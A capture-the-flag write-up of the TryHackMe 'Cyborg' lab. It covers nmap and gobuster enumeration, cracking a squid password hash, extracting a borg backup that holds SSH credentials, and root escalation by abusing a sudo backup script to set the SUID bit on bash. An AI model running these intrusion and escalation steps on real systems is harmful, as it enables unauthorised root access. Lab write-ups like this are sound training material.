/ TRYHACKME, CTF, EASY

Cyborg Write Up

cyborg

Overview

Cyborg is a easy room on TryHackMe.

Nmap

I deployed the machine and was given the target IP 10.10.4.85. I started a NMAP scan to check the available ports.

└──╼ $sudo nmap -sC -sV -oN nmap/initial 10.10.4.85
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-25 19:42 GMT
Nmap scan report for 10.10.4.85
Host is up (0.032s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds

2 Ports open:

  • 22 - SSH - Banner is showing its an Ubuntu machine
  • 80 - HTTP - Apache web server version 2.4.18

I also ran a full port scan but no additional ports were found.

Enumeration

The webpage just presents a default apache page so I ran a gobuster.

└──╼ $gobuster dir -u http://10.10.4.85 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.4.85
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/25 19:43:12 Starting gobuster
===============================================================
/admin (Status: 301)
/etc (Status: 301)
/server-status (Status: 403)
===============================================================
2021/01/25 19:45:28 Finished
===============================================================

/etc jumped out as I dont see that to often.

squid

Two files are in /etc/squid, passwd and squid.conf, I downloaded each, looking at passwd shows:

music_archive:$apr1$B{REDACTED}

Using hashcat I was able to crack the hash.

hashcat -m 1600 passwd /usr/share/wordlists/rockyou.txt

I now turned my attention to /admin which looks like a blog.

My name is Alex and im a music producer from The United Kingdom! This is my office!!

Clicking around took me to the page /admin/admin.html

shoutbox

This line jumped out……. I bet its not! :)

my backup “music_archive” is safe

There is a ‘Archive’ drop down on the website, clicking that and then download allows me to download a file ‘archieve.tar’.

archive

I extracted the tar file.

└──╼ $tar -xvf archive.tar 
home/field/dev/final_archive/
home/field/dev/final_archive/hints.5
home/field/dev/final_archive/integrity.5
home/field/dev/final_archive/config
home/field/dev/final_archive/README
home/field/dev/final_archive/nonce
home/field/dev/final_archive/index.5
home/field/dev/final_archive/data/
home/field/dev/final_archive/data/0/
home/field/dev/final_archive/data/0/5
home/field/dev/final_archive/data/0/3
home/field/dev/final_archive/data/0/4
home/field/dev/final_archive/data/0/1

However, the data looks to be encrypted and I keep seeing a reference to borg. I looked at the README file and saw:

This is a borg Backup repository.

I Googled borg backup and found a github page.

BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.

The main goal of Borg is to provide an efficient and secure way to backup data. The data deduplication technique used makes Borg suitable for daily backups since only changes are stored. The authenticated encryption technique makes it suitable for backups to not fully trusted targets.

I downloaded the Borg release to my machine and made it executable with ‘chmod +x borg-linux64’.

Reading the documentation, I was able to list archives so I tried that first. It prompted for a password, I entered the cracked password from the passwd file in /etc/squid.

└──╼ $./borg-linux64 list home/field/dev/final_archive/
Enter passphrase for key /home/daz/Documents/TryHackMe/Cyborg/home/field/dev/final_archive:
music_archive                        Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

Now I new the name of the archive, I could extract it.

└──╼ $./borg-linux64 extract home/field/dev/final_archive::music_archive
Enter passphrase for key /home/daz/Documents/TryHackMe/Cyborg/home/field/dev/final_archive:
drwxr-xr-x alex   alex          0 Tue, 2020-12-29 13:55:52 home/alex
-rw-r--r-- alex   alex       3637 Mon, 2020-12-28 14:25:14 home/alex/.bashrc
-rw-r--r-- alex   alex        220 Mon, 2020-12-28 14:25:14 home/alex/.bash_logout
-rw-r--r-- alex   alex        675 Mon, 2020-12-28 14:25:14 home/alex/.profile
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:00:24 home/alex/Music
-rw------- alex   alex        439 Mon, 2020-12-28 17:26:45 home/alex/.bash_history
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.dbus
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus
-rw-r--r-- root   root        464 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus/c707f46991feb1ed17e415e15fe9cdae-0
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript
-rw-r--r-- root   root       7046 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript/ActionScript.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript
-rw-r--r-- root   root       8934 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript/AppleScript.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP
-rw-r--r-- root   root       7254 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/ASP.sublime-syntax.cache
-rw-r--r-- root   root        640 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/HTML-ASP.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File
-rw-r--r-- root   root       4850 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File/Batch File.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#
-rw-r--r-- root   root        604 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/Build.sublime-syntax.cache
-rw-r--r-- root   root      17237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/C#.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++
-rw-r--r-- root   root      11817 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C.sublime-syntax.cache
-rw-r--r-- root   root      15283 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C++.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure
-rw-r--r-- root   root       2814 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure/Clojure.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS
-rw-r--r-- root   root      17947 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS/CSS.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D
-rw-r--r-- root   root      18692 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/D.sublime-syntax.cache
-rw-r--r-- root   root        287 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/DMD Output.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff
-rw-r--r-- root   root        806 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff/Diff.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang
-rw-r--r-- root   root       5881 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/Erlang.sublime-syntax.cache
-rw-r--r-- root   root        257 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/HTML (Erlang).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats
-rw-r--r-- root   root       1607 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Attributes.sublime-syntax.cache
-rw-r--r-- root   root       3096 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Commit.sublime-syntax.cache
-rw-r--r-- root   root       1314 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Common.sublime-syntax.cache
-rw-r--r-- root   root       1911 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Config.sublime-syntax.cache
-rw-r--r-- root   root        328 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Ignore.sublime-syntax.cache
-rw-r--r-- root   root        742 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Link.sublime-syntax.cache
-rw-r--r-- root   root        473 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Log.sublime-syntax.cache
-rw-r--r-- root   root       1342 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Rebase.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go
-rw-r--r-- root   root       7366 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go/Go.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz
-rw-r--r-- root   root       1506 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz/DOT.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy
-rw-r--r-- root   root       5574 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy/Groovy.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell
-rw-r--r-- root   root       2859 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Haskell.sublime-syntax.cache
-rw-r--r-- root   root        588 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Literate Haskell.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML
-rw-r--r-- root   root       5979 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML/HTML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java
-rw-r--r-- root   root       9275 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java.sublime-syntax.cache
-rw-r--r-- root   root        909 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java Server Pages (JSP).sublime-syntax.cache
-rw-r--r-- root   root       1661 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaDoc.sublime-syntax.cache
-rw-r--r-- root   root        575 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaProperties.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript
-rw-r--r-- root   root      16252 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JavaScript.sublime-syntax.cache
-rw-r--r-- root   root       1561 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JSON.sublime-syntax.cache
-rw-r--r-- root   root       1294 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/Regular Expressions (JavaScript).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX
-rw-r--r-- root   root       1079 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/Bibtex.sublime-syntax.cache
-rw-r--r-- root   root      10203 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX.sublime-syntax.cache
-rw-r--r-- root   root        668 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX Log.sublime-syntax.cache
-rw-r--r-- root   root       1788 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/TeX.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp
-rw-r--r-- root   root       5115 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp/Lisp.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua
-rw-r--r-- root   root       5353 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua/Lua.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile
-rw-r--r-- root   root        234 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Make Output.sublime-syntax.cache
-rw-r--r-- root   root       4762 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Makefile.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown
-rw-r--r-- root   root      11172 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/Markdown.sublime-syntax.cache
-rw-r--r-- root   root        393 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/MultiMarkdown.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab
-rw-r--r-- root   root      26157 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab/Matlab.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C
-rw-r--r-- root   root      25087 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C.sublime-syntax.cache
-rw-r--r-- root   root      15819 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C++.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml
-rw-r--r-- root   root        430 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/camlp4.sublime-syntax.cache
-rw-r--r-- root   root       6237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCaml.sublime-syntax.cache
-rw-r--r-- root   root       1659 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamllex.sublime-syntax.cache
-rw-r--r-- root   root       1623 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamlyacc.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal
-rw-r--r-- root   root       1171 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal/Pascal.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl
-rw-r--r-- root   root       8858 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl/Perl.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP
-rw-r--r-- root   root        447 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/PHP/PHP.sublime-syntax.cache
-rw-r--r-- root   root      32165 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/PHP Source.sublime-syntax.cache
-rw-r--r-- root   root       1248 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/Regular Expressions (PHP).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python
-rw-r--r-- root   root      17292 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Python.sublime-syntax.cache
-rw-r--r-- root   root       1130 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Regular Expressions (Python).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R
-rw-r--r-- root   root      14814 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R.sublime-syntax.cache
-rw-r--r-- root   root        219 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R Console.sublime-syntax.cache
-rw-r--r-- root   root       1177 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/Rd (R Documentation).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails
-rw-r--r-- root   root        427 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/HTML (Rails).sublime-syntax.cache
-rw-r--r-- root   root        388 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/JavaScript (Rails).sublime-syntax.cache
-rw-r--r-- root   root        985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby Haml.sublime-syntax.cache
-rw-r--r-- root   root       1486 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby on Rails.sublime-syntax.cache
-rw-r--r-- root   root        304 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/SQL (Rails).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions
-rw-r--r-- root   root       2985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions/RegExp.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText
-rw-r--r-- root   root       1611 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText/reStructuredText.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby
-rw-r--r-- root   root       9901 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby/Ruby.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust
-rw-r--r-- root   root        228 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Cargo.sublime-syntax.cache
-rw-r--r-- root   root       8561 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Rust.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala
-rw-r--r-- root   root      13481 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala/Scala.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript
-rw-r--r-- root   root      10255 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Bash.sublime-syntax.cache
-rw-r--r-- root   root       7668 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/commands-builtin-shell-bash.sublime-syntax.cache
-rw-r--r-- root   root        158 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Shell-Unix-Generic.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL
-rw-r--r-- root   root       2724 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL/SQL.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL
-rw-r--r-- root   root       1010 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/HTML (Tcl).sublime-syntax.cache
-rw-r--r-- root   root       4120 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/Tcl.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text
-rw-r--r-- root   root         92 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.cache
-rw-r--r-- root   root         43 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.rcache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile
-rw-r--r-- root   root       1783 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile/Textile.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML
-rw-r--r-- root   root       2344 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML/XML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML
-rw-r--r-- root   root       3850 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML/YAML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default
-rw-r--r-- root   root       4086 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Syntax Summary.cache
-rw-r--r-- root   root      10895 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Meta Info Summary.cache
-rw-r--r-- root   root    1003914 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Startup.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages/User
drwx------ root   root          0 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local
-rw-r--r-- root   root       5199 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local/Auto Save Session.sublime_session
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib/python3.3
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 13:55:52 home/alex/Documents
-rw-r--r-- root   root        110 Tue, 2020-12-29 13:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 17:59:30 home/alex/Public
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 17:59:37 home/alex/Videos
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 13:57:14 home/alex/Desktop
-rw-r--r-- root   root         71 Tue, 2020-12-29 13:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 17:59:57 home/alex/Downloads
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:00:02 home/alex/Templates
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:26:44 home/alex/Pictures

Scanning through the files I find ‘secret.txt’ which is a note from the author.

shoutout to all the people who have gotten to this stage whoop whoop

Initial Access

In the files is also ‘note.txt’ which provides SSH creds.

Wow I’m awful at remembering Passwords so I’ve taken my Friends advice and noting them down!

alex:{REDACTED}

With these I SSH in to the machine.

Priv Esc

Doing ‘sudo -l’ shows Alex can run ‘/etc/mp3backups/backup.sh’ as root without a password.

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

Looking at the script, it appears to be a simple back up script archiving all mp3 files in the Alex music directory however it also always accepts a parameter with ‘-c’ and executes it.

#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt


input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
        case "${flag}" in
                c) command=${OPTARG};;
        esac
done

backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

There a few ways to get root as you can run any command as root, you could cat the flag or create a reverse shell however, by giving bash a SUID bit with the command:

sudo ./backup.sh -c ‘chmod +s /bin/bash’

Now I can get a root shell!

alex@ubuntu:/etc/mp3backups$ bash -p
bash-4.3# whoami
root

Thanks for reading!

============================================================

Any comments or feedback welcome! You can find me on twitter.

Buy Me A Coffee